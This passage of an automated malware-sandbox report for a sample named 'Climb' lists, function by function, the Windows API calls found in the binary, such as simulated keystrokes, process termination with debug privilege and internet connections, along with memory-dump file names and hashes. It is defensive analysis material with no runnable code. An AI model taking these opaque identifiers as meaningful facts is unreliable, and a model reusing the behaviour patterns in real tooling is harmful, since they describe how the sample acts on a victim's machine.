                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                          • Opcode ID: 945c4ded011ab948c53e8a4ea2eb65102beb0c319dda982d84621425c91a1e61
                                                                                                                                                                          • Instruction ID: 8b1b680fad9812ed106bbf1424ff0b8eb6783a4e060af8d3976ec3f57cea1b33
                                                                                                                                                                          • Opcode Fuzzy Hash: 945c4ded011ab948c53e8a4ea2eb65102beb0c319dda982d84621425c91a1e61
                                                                                                                                                                          • Instruction Fuzzy Hash: E7610A71B04301AFDF25AF7CD981BAE7BE8EF02324F14057DE945AB281EB3199818791
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AF5C24
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00AF5C65
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AF5C6B
                                                                                                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AF5C6F
                                                                                                                                                                            • Part of subcall function 00AF79F2: DeleteObject.GDI32(00000000), ref: 00AF7A1E
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AF5CAB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF5CB8
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AF5CEB
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AF5D25
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AF5D34
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3210457359-0
                                                                                                                                                                          • Opcode ID: 40944ce2965c6d36ebd7a6b11641d4ad84fc861e93519e3f1b0a435bde4c42d0
                                                                                                                                                                          • Instruction ID: 9b906b91519fec8db2dcaf1640a811ca91d7dcc26ad173294bfb632163e4d239
                                                                                                                                                                          • Opcode Fuzzy Hash: 40944ce2965c6d36ebd7a6b11641d4ad84fc861e93519e3f1b0a435bde4c42d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F517B30E41A0CBFEF259BF4CC49BB83BA6AB05750F144112F725DA1E1D775A981EB40
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AA28D1
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AA28EA
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AA28FA
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AA2912
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AA2933
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A611F5,00000000,00000000,00000000,000000FF,00000000), ref: 00AA2942
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AA295F
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A611F5,00000000,00000000,00000000,000000FF,00000000), ref: 00AA296E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1268354404-0
                                                                                                                                                                          • Opcode ID: 61fbb8f78da5d9ef05f02ea2497e0ce335173d68d2e93b1b5e3ab903a3cad51d
                                                                                                                                                                          • Instruction ID: 587f88a73a923a506521be0c63b96f0bfb8c80b9f63b12b7c4101a200a22cff2
                                                                                                                                                                          • Opcode Fuzzy Hash: 61fbb8f78da5d9ef05f02ea2497e0ce335173d68d2e93b1b5e3ab903a3cad51d
                                                                                                                                                                          • Instruction Fuzzy Hash: C4518870600209AFDB24DF69CC85FAA7BB6FF48760F144528F9469B2E0DB70E991DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADCBC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00ADCBDA
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00ADCBEE
                                                                                                                                                                            • Part of subcall function 00ADCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADCCB7
                                                                                                                                                                            • Part of subcall function 00ADCC98: GetLastError.KERNEL32 ref: 00ADCD67
                                                                                                                                                                            • Part of subcall function 00ADCC98: SetEvent.KERNEL32(?), ref: 00ADCD7B
                                                                                                                                                                            • Part of subcall function 00ADCC98: InternetCloseHandle.WININET(00000000), ref: 00ADCD86
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                          • Opcode ID: c21558d6f4d30619c9cb36a9a87c047faaafee95a26d8480d6f3e2f4c578d1ee
                                                                                                                                                                          • Instruction ID: ee5170c0fa03baf568d91ab497fc705b234c7cf59ec5c2e11ff689f10cf133cc
                                                                                                                                                                          • Opcode Fuzzy Hash: c21558d6f4d30619c9cb36a9a87c047faaafee95a26d8480d6f3e2f4c578d1ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 57316D71500706AFDB229FA5CD44ABABBB9FF08320B54451EFA5B86710C731E915EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
                                                                                                                                                                            • Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
                                                                                                                                                                            • Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F0A
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AC2F28
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AC2F2C
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F36
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AC2F4E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AC2F52
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F5C
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AC2F70
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AC2F74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                          • Opcode ID: e027852271e0df11603411047f9b9f5045ba678a619d476eacda7a7a71f7be2e
                                                                                                                                                                          • Instruction ID: e24157102760863d15e3ef725bcb399a198e9a27ceda2cc205599e38a6939c64
                                                                                                                                                                          • Opcode Fuzzy Hash: e027852271e0df11603411047f9b9f5045ba678a619d476eacda7a7a71f7be2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A01D8307942147BFB11A7A89C8AF693F5ADB5DB51F110019F318AE1E0C9E15445CAAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AC1D95,?,?,00000000), ref: 00AC2159
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC2160
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1D95,?,?,00000000), ref: 00AC2175
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00AC1D95,?,?,00000000), ref: 00AC217D
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC2180
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1D95,?,?,00000000), ref: 00AC2190
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00AC1D95,00000000,?,00AC1D95,?,?,00000000), ref: 00AC2198
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC219B
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00AC21C1,00000000,00000000,00000000), ref: 00AC21B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                          • Opcode ID: e746952cb9a3de80e45211cffdd5ad7ad51475df93abe5098deddd8c52761db5
                                                                                                                                                                          • Instruction ID: fd0a96d1778587cfb8afb4e4f51c03730222d004a1a9a1e70f34e93c2c455ccb
                                                                                                                                                                          • Opcode Fuzzy Hash: e746952cb9a3de80e45211cffdd5ad7ad51475df93abe5098deddd8c52761db5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501A4B5240308BFEB11EBE5DC8DF6B7BADEB88711F018511FA05DB2A1CA709811CB24
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00ACDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00ACDDAC
                                                                                                                                                                            • Part of subcall function 00ACDD87: Process32FirstW.KERNEL32(00000000,?), ref: 00ACDDBA
                                                                                                                                                                            • Part of subcall function 00ACDD87: CloseHandle.KERNEL32(00000000), ref: 00ACDE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEABCA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AEABDD
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEAC10
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AEACC5
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00AEACD0
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEAD21
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                          • Opcode ID: bdf676c025beceaa964afe5cb3b33552c015694291ed5975068434076c22f050
                                                                                                                                                                          • Instruction ID: 76af123b97e651fe1adf4f75ada9449ec73a427460066de02018329d5d7e6a39
                                                                                                                                                                          • Opcode Fuzzy Hash: bdf676c025beceaa964afe5cb3b33552c015694291ed5975068434076c22f050
                                                                                                                                                                          • Instruction Fuzzy Hash: 72619D74204281AFD311DF59C995F29BBE1AFA4308F18849CE4664BBA3C771FC49CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF43C1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AF43D6
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF43F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF4435
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF4462
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF4490
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                          • Opcode ID: 838dec67c45a79364fda20722a9423747d3c91c83cef8679881f4875762609e9
                                                                                                                                                                          • Instruction ID: 1e5f085aa76079a28d970260432e1b3a6afbd2bc6c9fe2ae683d451a84f05afd
                                                                                                                                                                          • Opcode Fuzzy Hash: 838dec67c45a79364fda20722a9423747d3c91c83cef8679881f4875762609e9
                                                                                                                                                                          • Instruction Fuzzy Hash: F641AF7190031DABDB219FA4CC49BEB7BA9EF4C350F100526FA54EB291D7749990CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACC6C4
                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 00ACC6E4
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00ACC71A
                                                                                                                                                                          • GetMenuItemCount.USER32(01093C30), ref: 00ACC76B
                                                                                                                                                                          • InsertMenuItemW.USER32(01093C30,?,00000001,00000030), ref: 00ACC793
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                          • Opcode ID: 64b50b4fefab4f8c2c12cb342377b5d841b95ace0c239b88a75ee3b9d28a67af
                                                                                                                                                                          • Instruction ID: d7f900c171a502bf5038f9a2049db44f5f0c51c94b63b0c9e1055babb3376a24
                                                                                                                                                                          • Opcode Fuzzy Hash: 64b50b4fefab4f8c2c12cb342377b5d841b95ace0c239b88a75ee3b9d28a67af
                                                                                                                                                                          • Instruction Fuzzy Hash: DD519C70A002059BDF11CFA8C988FAEBBF9EF48324F25415EE919E7291E7709941CF61
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00ACD1BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                          • Opcode ID: 1c5aff199ee4c83b495f691258a234be6260313310cb17948aa63571f7b343c2
                                                                                                                                                                          • Instruction ID: bac97c92aacf018d37e93c6faa5fb3c90f497e3e1e5349f160540b3e6a9a42a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5aff199ee4c83b495f691258a234be6260313310cb17948aa63571f7b343c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 6511EC3528C317BAE7056B54EC82EAE7BEC9F09760B25017EF904A62D1EBB45E404264
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                          • Opcode ID: 2b035a3dee471a25a1b36a6ff62931fdae11877d4359af52e3441faab2cce057
                                                                                                                                                                          • Instruction ID: cf7f6adcc33e871898c22752e41b02b97835ed8d39853556faa87606ea138e9a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b035a3dee471a25a1b36a6ff62931fdae11877d4359af52e3441faab2cce057
                                                                                                                                                                          • Instruction Fuzzy Hash: D711B4719001157FCB25F7A0DD4AFEE77BCEF05714F0101A9F515A6091EEB48A82D790
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                          • Opcode ID: 2e1739767a581e5cea899d8dea2c4c0ce2d362cfe6dc5f9afff5c7c50e52a463
                                                                                                                                                                          • Instruction ID: 2f3b374db400fc3b6aa8ee1436d54ee86ee4c034f8005f4dea59974974dd29e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e1739767a581e5cea899d8dea2c4c0ce2d362cfe6dc5f9afff5c7c50e52a463
                                                                                                                                                                          • Instruction Fuzzy Hash: B7418165C10518A9DB11FBB88986FCFB7BDAF05310F518876E508E3161FA34D261C3A6
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00A7FC41
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00ABFC15
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00ABFC98
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                          • Opcode ID: bb186387e178f22b823327856ccfb39bbf9e46d199fd46ce4fc3f1aa7f81ee3e
                                                                                                                                                                          • Instruction ID: 06913bdee9272a788b662d33fcb07d6accc9b39f4d1e37d577270b83293373db
                                                                                                                                                                          • Opcode Fuzzy Hash: bb186387e178f22b823327856ccfb39bbf9e46d199fd46ce4fc3f1aa7f81ee3e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1241E9306083889EC7378B78CE9877A7FB6AB46311F28C53CE95E47965C631A981D711
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AF37B7
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00AF37BF
